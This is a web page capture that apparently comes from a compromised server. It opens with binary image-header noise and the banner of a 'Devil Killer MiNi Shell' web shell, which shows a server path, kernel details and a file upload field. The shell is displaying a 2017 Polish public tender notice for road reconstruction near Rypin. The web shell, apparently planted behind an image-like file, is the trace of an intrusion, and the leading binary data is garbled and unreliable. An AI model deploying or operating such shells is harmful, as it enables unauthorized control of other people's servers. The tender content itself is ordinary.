JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170116/8643-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http:// bip.powiatrypinski.pl  (zakładka : Jednostki organizacyjne) ' target='_blank'>http:// bip.powiatrypinski.pl  (zakładka : Jednostki organizacyjne) </a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 8643 - 2017
              z dnia 2017-01-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rypin: Wykonanie robót budowlanych związanych z przebudową dróg powiatowych  

1.  Przebudowa drogi powiatowej nr 2225C Stary Kobrzyniec - Czumsk Duży - gr. woj.      
     (Szczutowo) na odcinku Rogowo - Sosnowo ETAP 2 od km 3+712,76 do km     
     8+392,00

2.  Przebudowa drogi powiatowej nr 2118C SzafarniaWąpielskDługieRypin 
     od km 6+098 do km 11+550
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych, krajowy numer identyfikacyjny
              91087020200000, ul.
              ul. Strażacka 
              1,
              87500  
              Rypin, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              54 2803404 (05), e-mail
              techniczny48@o2.pl, faks
              542 803 405.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br /> bip.powiatrypinski.pl  (zakładka : Jednostki organizacyjne) </div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferta musi być złożona w formie pisemnej<br />
                Adres:
                <br />siedzba Zarządu Dróg Powiatowych: 87-500 Rypin, ul. Strażacka 1  </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie robót budowlanych związanych z przebudową dróg powiatowych  

1.  Przebudowa drogi powiatowej nr 2225C Stary Kobrzyniec - Czumsk Duży - gr. woj.      
     (Szczutowo) na odcinku Rogowo - Sosnowo ETAP 2 od km 3+712,76 do km     
     8+392,00

2.  Przebudowa drogi powiatowej nr 2118C SzafarniaWąpielskDługieRypin 
     od km 6+098 do km 11+550
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie nr I
Przebudowa drogi powiatowej nr 2225C Stary Kobrzyniec - Czumsk Duży -                      gr. woj. (Szczutowo) na odcinku Rogowo - Sosnowo ETAP 2 od km 3+712,76     
do km 8+392,00

	Długość przebudowywanego odcinka drogi - 4,679 km;
	klasa techn. Z ;
	prędkość projektowa - 50 km/h; 
	kategoria ruchu - KR1; 
	szer. jezdni 5,5m; szer. pobocza 2x1,0m (w tym pobocze wzmocnione o szer. 0,5m
	wykonanie w-wy wyrównawczej z betonu asf. gr.4cm - m2 22050;
	wykonanie w-wy ścieralnej z betonu asf. gr. 4cm - m2 26410; 
	ułożenie geosiatki na poszerzeniu jezdni - m2 8890;
	przebudowa istn. skrzyżowania  trójwlotowego - szt 1;
	budowa chodników - 178 mb;
	przebudowa chodników - 297 mb; 
	odtworzenie rowów odwadniających - m 8400;
	budowa i przebudowa zjazdów wraz z przepustami - m 116;
	budowa peronów przystankowych - szt.4; 
	wykonanie w m. Sosnowo oświetlenia drog. hybrydowego na przejściu dla pieszych - szt.1 
	wykonanie oznakowania aktywnego przejść dla pieszych - kpl.1 (przy PKS);
	 montaż oznakowania pionowego - 51szt; 
	wykonanie oznakowania poziomego (linie na skrzyżowaniach i przejściach dla pieszych) - m2 48.
	wycinka drzew wraz z usunięciem i wywozem karpiny  szt. 72; 
Zadanie nr II
Przebudowa drogi powiatowej nr 2118C SzafarniaWąpielskDługieRypin od km 6+098 do km 11+550
      -   długość przebudowywanego odcinka drogi - 4952 mb,
      -   klasa techniczna drogi  Z ; 
      -   prędkość projektowa  40 km/h; 
      -   szerokość drogi - 5,5 metra; 
      -   szerokość pasów ruchu  2,75 metra; 
-   szerokość chodników  2,0 metry;
-   szerokość pobocza- 2,0 metry;
-   szerokość zjazdów drogowych  4,0 metry;
-   kategoria ruchu  KR2 ; 
-   nośność drogi  100kN/oś
      -  długość wybudowanych chodników  4050 mb ;
      -  pobocze : wzmocnione obustronnie na szer. 0,5 m - 2770 m2 ;
      -  frezowanie nawierzchni jezdni w miejscach skoleinowanych  22420 m˛ ; 
      -  wykonanie bitumicznej warstwy wyrównawczej z betonu asfaltowego AC 11W śr. gr. 4     
         cm  22420 m2 ; 
      -  wykonanie warstwy ścieralnej z betonu asfaltowego AC 8 S gr. 4 cm całym odcinku     
         drogi (4,952 km)   27865 m˛ ;  
      -  wzmocnienie nawierzchni geosiatką na styku starej i nowej nawierzchni o szer. 2,0 m        
         m2 9980 .
      -  montaż oznakowania pionowego   szt. 37 ; 
      -  montaż znaku aktywnego - przejście dla pieszych  kpl 2 ; 
      -  oświetlenie przy przejściach dla pieszych zasilanych energią słoneczną i wiatrową
         kpl. 5 ; 
      -  bariery ochronne skrajne: 134 mb; 
      -  poręcze ochronne zabezpieczające ruch pieszy: 40 mb ; 
      -  wykonanie oznakowania poziomego : linie na trasie, skrzyżowaniach i przejściach dla     
         pieszych -363 m2 ; 
      -  wycinka drzew wraz z usunięciem i wywozem karpiny  szt. 270; 
      -  urządzenia wyposażenia technicznego drogi: odwodnienie  ściek podchodnikowy z      
         prefabrykowanych elementów betonowych (korytkowy)  mb 195;  
<br /><br /><b>II.5) Główny kod CPV: </b>45233100-0<br /><b> Dodatkowe kody CPV:</b>45233300-2,
                45233252-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa w tym zakresie szczegółowych warunków. 
	Wykonawca  powinien  złożyć  stosowne  oświadczenie  o  spełnieniu  warunku  	udziału  w postępowaniu. 
	Zamawiający  oceni  spełnienie  warunków  udziału  w  postępowaniu  na  podstawie  	złożonego przez Wykonawcę oświadczenia o spełnieniu warunku udziału w 	postępowaniu.  
	Ocena spełnienia warunków będzie dokonywana na zasadzie: spełnia/nie spełnia. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                W  szczególności  w  celu  wykazania  spełniania  warunku  znajdowania  się 
	Wykonawcy w sytuacji ekonomicznej lub finansowej zapewniającej wykonanie 
	zamówienia: 
            Wykonawca  spełni  warunek  jeżeli  wykaże,  że jest ubezpieczony od      
            odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej     
            związanej  z  przedmiotem  zamówienia  na  sumę  gwarancyjną  tj.  kwotę  min. 
            700.000,00  złotych. 	  
	Ocena spełnienia warunków będzie dokonywana na zasadzie: spełnia/nie spełnia. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                W  szczególności  w  celu  wykazania  spełniania  warunku  posiadania  przez 
	Wykonawcę  zdolności  technicznej  lub  zawodowej  zapewniającej  wykonanie 
	zamówienia: 
	Zamawiający określa w tym zakresie następujące szczegółowe warunki:  
1)        W  zakresie  wykazania  się  stosownym  doświadczeniem  Wykonawca  powinien 
           wykazać się wykonaniem robót budowlanych wykonanych nie wcześniej niż w okresie      
           ostatnich  5  lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  	prowadzenia działalności  jest  krótszy  -  w  tym  okresie,  wraz  z  podaniem  ich  	rodzaju,  wartości, daty, miejsca  wykonania  i  podmiotów,  na  rzecz  których  	roboty  te  zostały wykonane,  z załączeniem dowodów określających czy te roboty 	budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty        
            zostały wykonane zgodnie z przepisami prawa budowlanego  i  prawidłowo  	ukończone,  przy  czym  dowodami,  o  których  mowa,  są referencje  bądź  inne  	dokumenty  wystawione przez  podmiot,  na  rzecz  którego  roboty budowlane  były      
            wykonywane,  a  jeżeli  z uzasadnionej  przyczyny  o  obiektywnym charakterze    
            wykonawca nie jest w stanie uzyskać tych dokumentów  - inne dokumenty, przy czym    
            Zamawiający określa następujące roboty budowlane w zakresie niezbędnym do     
            wykazania  posiadania  przez Wykonawcę  stosownego doświadczenia:  co  najmniej      
            3 roboty  budowlane  o charakterze  i  złożoności porównywalnej  z  zakresem     
            zadania będącego  przedmiotem   zamówienia,  tj,  co  najmniej  3  roboty      
            budowlane w  zakresie budowy  lub przebudowy  drogi  o  nawierzchni  z  betonu      
            asfaltowego  o długości przynajmniej 1,0 km.   
            Zamawiający  oceni  spełnienie  warunków  udziału  w  postępowaniu  na  podstawie     
            złożonego przez Wykonawcę oświadczenia o spełnieniu warunku udziału w     
            postępowaniu i pozostałych dokumentów.  
           Ocena spełnienia warunków będzie dokonywana na zasadzie: spełnia/nie spełnia. 
2)        W  zakresie  wykazania  się  stosownym  potencjałem  technicznym  Wykonawca 
	powinien  wykazać  się  dysponowaniem  narzędziami,  wyposażeniem  zakładu  lub 
	urządzeniami  technicznymi  dostępnymi  Wykonawcy  w  celu  wykonania  	zamówienia publicznego wraz z informacją  o podstawie do dysponowania tymi 	zasobami,  przy czym Zamawiający  określa  następujące  narzędzia,  wyposażenie       
            zakładu  lub  urządzenia techniczne  w  zakresie  niezbędnym  do  wykazania     
            posiadania  przez  Wykonawcę stosownego potencjału technicznego:  
a)  koparka, w tym do wykonywania  wykopów głębokich 
b)  ładowarka  
c)  równiarka lub spycharka uniwersalna 
d)  walec stalowy wibracyjny lub statyczny 
e)  walec ogumiony 
f)   skrapiarka lepiszcza  
g)  równiarka albo układarka do rozkładania mieszanki tłuczniowej, 
h)  wytwórnia  (otaczarka)  o  mieszaniu  cyklicznym  lub  ciągłym,  z  automatycznym 
     komputerowym  sterowaniem  produkcji,  do  wytwarzania  mieszanek  mineralno-
    asfaltowych,  
i)  układarka gąsienicowa z elektronicznym sterowaniem równości układanej warstwy,  
j)  samochody samowyładowcze z przykryciem brezentowym lub termosami  szt. 3 . 
   Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie złożonego 
   przez Wykonawcę oświadczenia o spełnieniu warunku udziału w postępowaniu i         
   pozostałych dokumentów.  
Ocena spełnienia warunków będzie dokonywana na zasadzie: spełnia/nie spełnia. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Wykaz  oświadczeń  lub  dokumentów,  składanych  przez  wykonawcę  w 
	postępowaniu w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 
	1 pkt 3 ustawy  Prawo zamówień publicznych, tj. w celu potwierdzenia braku 
	podstaw do wykluczenia:  
9.3.1.  Wykonawca,  zobowiązany  jest  złożyć Zamawiającemu,  w  terminie  3  dni  od  dnia 
	zamieszczenia  na  stronie  internetowej  Zamawiającego  informacji,  o  której  mowa  	w art.  86  ust.  5  ustawy    Prawo  zamówień  publicznych,  następujące  	oświadczenia  i dokumenty,  aktualne  na  dzień  złożenia  przedmiotowego  	oświadczenia  lub dokumentu, w celu potwierdzenia okoliczności, o których mowa w 	art. 25 ust. 1 pkt 3  ustawy    Prawo  zamówień  publicznych,  tj.  w  celu  	potwierdzenia  braku  podstaw wykluczenia Wykonawcy z postępowania: 
1)  Oświadczenie  o  przynależności  lub  braku  przynależności  do  tej  samej  grupy 
	kapitałowej,  o  której  mowa  w  art.  24  ust.  1  pkt  23  ustawy    Prawo  zamówień 
	publicznych. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić 	dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji 	w postępowaniu o  udzielenie  zamówienia  -  z  wykorzystaniem  wzoru  	stanowiącego  Załącznik  nr  6  do Specyfikacji. 
9.3.2.  Wykonawca,  którego  oferta  została  najwyżej  oceniona,  zobowiązany  jest  złożyć 
	Zamawiającemu,  na  jego  wezwanie,  w  wyznaczonym,  nie  krótszym  niż  5  dni, 
	terminie,  następujące  oświadczenia  i  dokumenty,  aktualne  na  dzień  złożenia
	przedmiotowego  oświadczenia  lub  dokumentu,  w  celu  potwierdzenia okoliczności, 	o których mowa w art. 25 ust. 1 pkt 3 ustawy  Prawo zamówień publicznych, tj. w 	celu potwierdzenia braku podstaw wykluczenia Wykonawcy z postępowania: 
1)  Zaświadczenie  właściwego  naczelnika  urzędu  skarbowego  potwierdzającego,  że 
	wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 	miesiące przed  upływem  terminu  składania  ofert,  lub  inny  dokument 	potwierdzający,  że wykonawca zawarł porozumienie z właściwym organem 	podatkowym w sprawie spłat tych należności  wraz  z  ewentualnymi  odsetkami  lub  	grzywnami,  w  szczególności  uzyskał przewidziane  prawem  zwolnienie, odroczenie  	lub  rozłożenie  na  raty  zaległych  płatności lub wstrzymanie w całości wykonania 	decyzji właściwego organu, 
2)  Zaświadczenie  właściwej  terenowej  jednostki  organizacyjnej  Zakładu  Ubezpieczeń 
	Społecznych  lub  Kasy  Rolniczego  Ubezpieczenia  Społecznego  albo  inny  	dokument potwierdzający,  że  wykonawca  nie  zalega  z  opłacaniem  składek  na  	ubezpieczenia społeczne  lub  zdrowotne,  wystawione  nie  wcześniej  niż  3      
            miesiące przed  upływem terminu  składania  ofert,  lub  inny  dokument      
            potwierdzający,  że  	wykonawca  zawarł porozumienie z właściwym organem w     
            sprawie spłat tych należności wraz z ewentualnymi odsetkami  lub  grzywnami,  w     
            szczególności uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub     
            rozłożenie  na  raty  	zaległych  płatności  lub  wstrzymanie  w  całości wykonania    
            decyzji właściwego organu,  
3)  Odpis  z  właściwego  rejestru  lub  z  centralnej  ewidencji  i  informacji  o  działalności 
	gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w 	celu potwierdzenia  braku  podstaw  wykluczenia  na  podstawie  art. 24  ust. 5  pkt  1  	ustawy   Prawo zamówień publicznych. 
 
9.3.3.  Jeżeli  wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  poza  terytorium 
	Rzeczypospolitej Polskiej, w celu potwierdzenia okoliczności, o których mowa w art. 
	25  ust.  1  pkt  3  ustawy    Prawo  zamówień  publicznych,  tj.  w  celu 	potwierdzenia braku  podstaw  do  wykluczenia  zamiast  dokumentu,  o  którym  	mowa  w  pkt  9.3.2. SIWZ  składa  dokument  lub  dokumenty  wystawione  w  kraju,  	w  którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające 	odpowiednio, że: 
1)  nie  zalega  z  opłacaniem  podatków,  opłat,  składek  na  ubezpieczenie  społeczne  lub 
	zdrowotne  albo  że  zawarł  porozumienie  z  właściwym  organem  w  sprawie  spłat  	tych należności  wraz  z  ewentualnymi  odsetkami  lub  grzywnami,  w  szczególności  	uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 	płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,  
2)  nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
	Dokumenty,  o  których  mowa  w  ppkt  2),  powinny  być  wystawione  nie wcześniej  	niż  6 miesięcy  przed  upływem  terminu  składania  ofert.  Dokument,  o  którym  	mowa  w  ppkt  1), powinien być wystawiony nie wcześniej niż 3 miesiące przed 	upływem tego terminu. 
 	Jeżeli  w  kraju,  w  którym  wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  lub  	miejsce zamieszkania  ma  osoba,  której  dokument  dotyczy,  nie  wydaje  się  	dokumentów,  o  których powyżej  mowa,  zastępuje  się  je  dokumentem 	zawierającym  odpowiednio  oświadczenie wykonawcy,  ze  wskazaniem  osoby  albo  	osób  uprawnionych  do  jego  reprezentacji,  lub oświadczenie  osoby,  której  	dokument  miał  dotyczyć,  złożone  przed  notariuszem  lub  przed organem  	sądowym,  administracyjnym  albo  organem  samorządu  zawodowego  lub 
